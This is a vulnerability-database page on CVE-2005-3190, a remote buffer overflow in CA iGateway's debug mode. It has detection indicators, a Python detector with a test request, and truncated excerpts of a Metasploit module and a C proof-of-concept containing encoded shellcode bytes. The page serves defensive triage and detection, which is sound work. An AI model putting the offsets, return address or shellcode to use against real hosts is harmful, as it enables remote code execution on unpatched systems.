CVE-2005-3190
Published 2005-10-13
Priority P2 (62) · Severity high · CVSS 2.0 base score 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit available · EPSS 65.61% (99.2th percentile)
Buffer overflow in Computer Associates (CA) iGateway 3.0 and 4.0 before 4.0.050623, when running in debug mode, allows remote attackers to execute arbitrary code via HTTP GET requests.
Affected (2 ranges, per the description above)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| broadcom | igateway | 3.0 | — |
| broadcom | igateway | 4.0 before 4.0.050623 | 4.0.050623 |
Detection & IOCs (extracted from sources)
bytes: \xdd\x10\x12\x12
bytes: \x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d\x19\x6d\xf7\x83\xeb\xfc\xe2\xf4
- Detect exploit attempts by monitoring for oversized HTTP GET requests (more than 1000 bytes in the request path) to TCP port 5250, the iGateway service port.
- Banner-check fingerprint: a vulnerable iGateway instance answers HEAD / HTTP/1.0 with the string 'GET and POST methods are the only methods supported at this time'. This identifies the service, not whether debug mode is on, so treat it as a triage signal and confirm the igateway.conf setting before calling a host exploitable.
- The Metasploit module uses SEH-based exploitation with a return address of 0x120bd9c4 (a pop/pop/ret in xerces-c_2_1_0.dll). On the wire that 32-bit x86 pointer appears little-endian as the bytes \xc4\xd9\x0b\x12; their presence in traffic to port 5250 is a strong exploit indicator.
- The exploit payload uses TCP port 1711 for its shell. Whether the payload connects back or listens, an unexpected connection involving that port on an iGateway host after a large GET to port 5250 is worth investigating.
- The SEH overwrite sits at offset 1082 in the exploit buffer; a GET request to port 5250 with roughly 5000 random alphanumeric bytes in the URI path is characteristic of this attack.
- The vulnerability is only exploitable when debug mode is explicitly enabled in igateway.conf (a non-default configuration); systems without debug mode enabled are not exploitable via this path.
- The Metasploit module notes that Ordinal (ws2ord) payloads work best because the payload must avoid null bytes, newlines, carriage returns and spaces, the bad characters for this injection point.
- The standalone PoC exploit uses a hardcoded return address for Windows 2000 SP4; a separate (commented-out) address targets Windows XP SP2, so offsets are target-specific and the indicator bytes above will differ per target build.
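As an added example that is not part of this page, the CA product, or the Metasploit and PoC code, the following Python turns the indicators above into a small request analyzer plus the HEAD banner check, and runs them over constructed sample traffic. The port, size threshold, return address, IOC bytes and banner string are the ones listed above; the function names, the sample requests and the SEH layout assumed by the test vector (next-SEH slot then handler address at offset 1082) are this example's own assumptions.

```python
import struct

# Values taken from the indicators listed on this page.
IGATEWAY_PORT = 5250
OVERSIZED_PATH_BYTES = 1000
MSF_POP_POP_RET = 0x120bd9c4  # pop/pop/ret in xerces-c_2_1_0.dll (Metasploit module)
BANNER_FINGERPRINT = b"GET and POST methods are the only methods supported at this time"

# x86 stack addresses appear on the wire as 32-bit little-endian values.
RET_ADDR_MSF = struct.pack("<I", MSF_POP_POP_RET)   # b"\xc4\xd9\x0b\x12"
RET_ADDR_POC = b"\xdd\x10\x12\x12"                  # extracted IOC bytes (0x121210dd)
# First 13 bytes of the extracted shellcode IOC: the Metasploit fnstenv/XOR
# decoder stub. The four bytes after it (\x3d\x19\x6d\xf7) are the XOR key,
# which changes per payload, so they are deliberately not matched.
SHELLCODE_STUB = b"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"


def parse_request_line(raw: bytes):
    """Split the HTTP request line into (method, target, version) or None.

    The target is taken up to the LAST space before the version so that binary
    bytes in the path (e.g. 0x0b inside the return address) do not break the
    parse; a space inside the path is impossible for this exploit anyway,
    since space is one of its bad characters.
    """
    line = raw.split(b"\n", 1)[0].rstrip(b"\r")
    method, sep, rest = line.partition(b" ")
    target, sep2, version = rest.rpartition(b" ")
    if not sep or not sep2 or not version.startswith(b"HTTP/"):
        return None
    return method, target, version


def analyze_request(dst_port: int, raw: bytes) -> list:
    """Return the names of the CVE-2005-3190 indicators that fire for one request."""
    hits = []
    if dst_port != IGATEWAY_PORT:
        return hits                      # rule is scoped to the iGateway port
    parsed = parse_request_line(raw)
    if parsed is None:
        return hits                      # not an HTTP request line
    method, target, _ = parsed
    if method == b"GET" and len(target) > OVERSIZED_PATH_BYTES:
        hits.append("oversized_get_path")
    if RET_ADDR_MSF in raw:
        hits.append("seh_ret_addr_xerces")
    if RET_ADDR_POC in raw:
        hits.append("poc_ret_addr")
    if SHELLCODE_STUB in raw:
        hits.append("msf_shellcode_stub")
    return hits


def is_igateway_banner(response: bytes) -> bool:
    """Fingerprint check on the reply to a 'HEAD / HTTP/1.0' probe.

    A match identifies the iGateway service, not whether debug mode is on;
    exploitability still depends on <debug>True</debug> in igateway.conf.
    """
    return BANNER_FINGERPRINT in response


def build_sample_exploit_request() -> bytes:
    """Constructed test vector approximating the layout described on the page:
    a ~5000-byte path with the SEH overwrite at offset 1082 (assumed here to be
    a 4-byte next-SEH slot followed by the pop/pop/ret address). It carries no
    shellcode; it exists only to exercise the detector."""
    filler = b"A" * 1082
    seh = b"\xeb\x06\x90\x90" + RET_ADDR_MSF       # short jump + handler address
    tail = b"B" * (5000 - len(filler) - len(seh))
    return b"GET /" + filler + seh + tail + b" HTTP/1.0\r\nHost: target\r\n\r\n"


if __name__ == "__main__":
    print(analyze_request(IGATEWAY_PORT, build_sample_exploit_request()))
    print(analyze_request(IGATEWAY_PORT, b"GET /index.html HTTP/1.0\r\n\r\n"))
```

The size heuristic alone fires on any long URL to port 5250, so in practice it pairs with one of the byte indicators; the return-address match is the higher-confidence signal, but as the last bullet above notes, it only covers the PoC builds and will miss an exploit retargeted at another Windows service pack.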
No detection rules found.
Exploit-DB
CA iTechnology iGateway - Debug Mode Buffer Overflow (Metasploit)
exploitdb · 2010-04-30 · CVE-2005-3190
---
```ruby
##
# $Id: ca_igateway_debug.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA iTechnology iGateway Debug Mode Buffer Overflow',
			'Description'    => %q{
				This module exploits a vulnerability in the Computer Associates
				iTechnology iGateway component. When <debug>True</debug> is enabled
				in igateway.conf (non-default), it is possible to overwrite the stack
				and execute code remotely. This module works best with Ordinal payloads.
			},
			'Author'         => 'patrick',
			'License'        => MSF_LICENS
```
Exploit-DB
CA iTechnology iGateway - 'Debug Mode' Remote Buffer Overflow
exploitdb · 2005-10-10 · CVE-2005-3190
---
```c
/*ca igateway debug remote overflow -egm [email protected]*/
/*01.30.05*/
#include
#include
#include
#include
const int MAXSIZE = 17110;           /* size of the request buffer sent to port 5250 */
char sc[] = //metasploit             /* encoded shellcode; the fnstenv/XOR decoder stub comes first */
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d\x19\x6d"
"\xf7\x83\xeb\xfc\xe2\xf4\xc1\x73\x86\xba\xd5\xe0\x92\x08\xc2\x79"
"\xe6\x9b\x19\x3d\xe6\xb2\x01\x92\x11\xf2\x45\x18\x82\x7c\x72\x01"
"\xe6\xa8\x1d\x18\x86\xbe\xb6\x2d\xe6\xf6\xd3\x28\xad\x6e\x91\x9d"
"\xad\x83\x3a\xd8\xa7\xfa\x3c\xdb\x86\x03\x06\x4d\x49\xdf\x48\xfc"
"\xe6\xa8\x19\x18\x86\x91\xb6\x15\x26\x7c\x62\x05\x6c\x1c\x3e\x35"
"\xe6\x7e\x51\x3d\x71\x96\xfe\x28\xb6\x93\xb6\x5a\x5d\x7c\x7d\x15"
"\xe6\x87\x21\xb4\xe6\xb7\x35\x47\x05\x79\x73\x17\x81\xa7\xc2\xcf"
"\x0b\xa4\x5b\x71\x5e\xc5\x55\x6e
```
Metasploit
CA iTechnology iGateway Debug Mode Buffer Overflow
metasploit
This module exploits a vulnerability in the Computer Associates iTechnology iGateway component. When <debug>True</debug> is enabled in igateway.conf (non-default), it is possible to overwrite the stack and execute code remotely. This module works best with Ordinal payloads.
No writeups or analysis indexed.
References
- http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0349.html
- http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0418.html
- http://secunia.com/advisories/17085
- http://securityreason.com/securityalert/86
- http://securitytracker.com/id?1015045
- http://www.osvdb.org/19920
- http://www.securityfocus.com/bid/15025
- http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33485
- https://exchange.xforce.ibmcloud.com/vulnerabilities/22560